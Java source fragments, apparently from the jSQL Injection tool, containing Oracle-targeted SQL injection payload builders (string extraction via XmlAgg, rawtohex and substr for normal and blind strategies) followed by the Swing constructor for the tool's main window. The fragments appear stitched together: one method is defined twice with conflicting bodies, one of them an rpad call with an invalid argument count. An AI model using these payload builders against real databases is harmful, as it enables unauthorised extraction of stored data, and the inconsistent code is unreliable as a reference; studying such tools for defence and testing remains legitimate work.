@Override
public String performanceQuery(String[] indexes) {
return MediatorModel.model()
.initialQuery
.replaceAll(
"1337(" + ToolsString.join(indexes, "|") + ")7331",
/** rpad 1024 (not 65536) to avoid error 'result of string concatenation is too long' */
"(SELECT+TO_CHAR("
+ "(SELECT*"
+ "FROM"
+ "(SELECT'SQLi$1'"
+ "||SUBSTR("
+ "(SELECT+utl_raw.cast_to_varchar2(CAST(DBMS_LOB.SUBSTR(REPLACE(REPLACE(XmlAgg(XmlElement(\"a\",rawtohex("
+ "s"
+ "))"
+ "ORDER+BY+s+nulls+last).getClobVal(),'<a>',''),'<%2fa>',rawtohex('6'))"
+ "||rawtohex('1337'),4000,1)AS+VARCHAR(1024)))"
+ "FROM"
+ "(SELECT+DISTINCT+rpad('%23',1024,'%23')s+FROM+dual"
+ ")"
+ "),1,3996)"
+ "FROM+dual"
+ ")x"
+ "))"
+ "FROM+dual)");
}
@Override
public String getIndicesCapacity(String[] indexes) {
return MediatorModel.model()
.initialQuery
.replaceAll(
"1337(" + ToolsString.join(indexes, "|") + ")7331",
"('SQLi'||$1||repeat('%23',1024)||'iLQS')");
}
@Override
public String getIndicesCapacity(String[] indexes) {
return MediatorModel.model()
.initialQuery
.replaceAll(
"1337(" + ToolsString.join(indexes, "|") + ")7331",
"(select'SQLi$1'||rpad('%23',1024,'%23',1025)||'iLQS'from+dual)");
}
@Override
public String normalStrategy(String sqlQuery, String startPosition) {
return "select'SQLi'||substr(r,"
+ startPosition
+ ","
+
/** Minus 'SQLi' should apply */
MediatorModel.model().normalStrategy.getPerformanceLength()
+ ")from("
+ sqlQuery
+ ")x";
}
@Override
public String blindStrategy(String sqlQuery, String startPosition) {
return "("
+ "select+"
+ ""
+ "'SQLi'||"
+ "substr("
+ "("
+ sqlQuery
+ "),"
+ startPosition
+ ","
+ MediatorModel.model().performanceLength
+ ")from+dual"
+ ""
+ ")";
}
/** Build the GUI: add app icon, tree icons, the 3 main panels. */
public JFrameGUI() {
super("jSQL Injection");
MediatorGUI.register(this);
MediatorModel.model().addObserver(this);
// Define a small and large app icon
this.setIconImages(HelperGUI.getIcons());
// Load UI before any component
HelperGUI.prepareGUI();
ShadowPopupFactory.install();
// Save controller
MediatorGUI.register(new Menubar());
this.setJMenuBar(MediatorGUI.menubar());
// Define the default panel: each component on a vertical line
this.getContentPane().setLayout(new BoxLayout(this.getContentPane(), BoxLayout.PAGE_AXIS));
// Textfields at the top
MediatorGUI.register(new PanelTop());
this.add(MediatorGUI.top());
// Main panel for tree ans tables in the middle
JPanel mainPanel = new JPanel(new GridLayout(1, 0));
this.outputPanel = new PanelLeftRightBottom();
mainPanel.add(this.outputPanel);
this.add(mainPanel);
MediatorGUI.gui()
.addWindowListener(
new WindowAdapter() {
@Override
public void windowClosing(WindowEvent e) {
Preferences prefs = Preferences.userRoot().node(InjectionModel.class.getName());
prefs.putInt(
PanelLeftRightBottom.VERTICALSPLITTER_PREFNAME,
JFrameGUI.this.outputPanel.leftRight.getDividerLocation());
prefs.putInt(
PanelLeftRightBottom.HORIZONTALSPLITTER_PREFNAME,
JFrameGUI.this.outputPanel.getHeight()
- JFrameGUI.this.outputPanel.getDividerLocation());
prefs.putBoolean(HelperGUI.BINARY_VISIBLE, false);
prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, false);
prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, false);
prefs.putBoolean(HelperGUI.JAVA_VISIBLE, false);
for (int i = 0; i < MediatorGUI.bottom().getTabCount(); i++) {
if ("Binary".equals(MediatorGUI.bottom().getTitleAt(i))) {
prefs.putBoolean(HelperGUI.BINARY_VISIBLE, true);
} else if ("Chunk".equals(MediatorGUI.bottom().getTitleAt(i))) {
prefs.putBoolean(HelperGUI.CHUNK_VISIBLE, true);
} else if ("Network".equals(MediatorGUI.bottom().getTitleAt(i))) {
prefs.putBoolean(HelperGUI.NETWORK_VISIBLE, true);
} else if ("Java".equals(MediatorGUI.bottom().getTitleAt(i))) {
prefs.putBoolean(HelperGUI.JAVA_VISIBLE, true);
}
}
}
});
// Info on the bottom
MediatorGUI.register(new PanelStatusbar());
this.add(MediatorGUI.status());
// Reduce size of components
this.pack(); // nécessaire après le masquage des param proxy
// Size of window
this.setSize(1024, 768);
this.setVisible(true);
this.setDefaultCloseOperation(JFrame.EXIT_ON_CLOSE);
// Center the window
this.setLocationRelativeTo(null);
// Define the keyword shortcuts for tabs #Need to work even if the focus is not on tabs
ActionHandler.addShortcut(this.getRootPane(), MediatorGUI.right());
ActionHandler.addTextFieldShortcutSelectAll();
}